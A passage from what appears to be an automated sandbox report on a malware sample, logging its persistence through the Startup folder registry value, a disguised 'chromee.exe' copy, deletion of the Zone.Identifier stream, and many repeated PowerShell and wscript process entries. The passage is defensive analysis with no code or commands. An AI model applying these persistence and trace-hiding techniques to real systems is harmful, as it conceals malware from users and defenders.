Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup

Jump to behavior

Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\chromee	Jump to behavior
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\chromee\chromee.exe	Jump to behavior
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\chromee\chromee.exe\:Zone.Identifier:$DATA	Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe

File opened: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

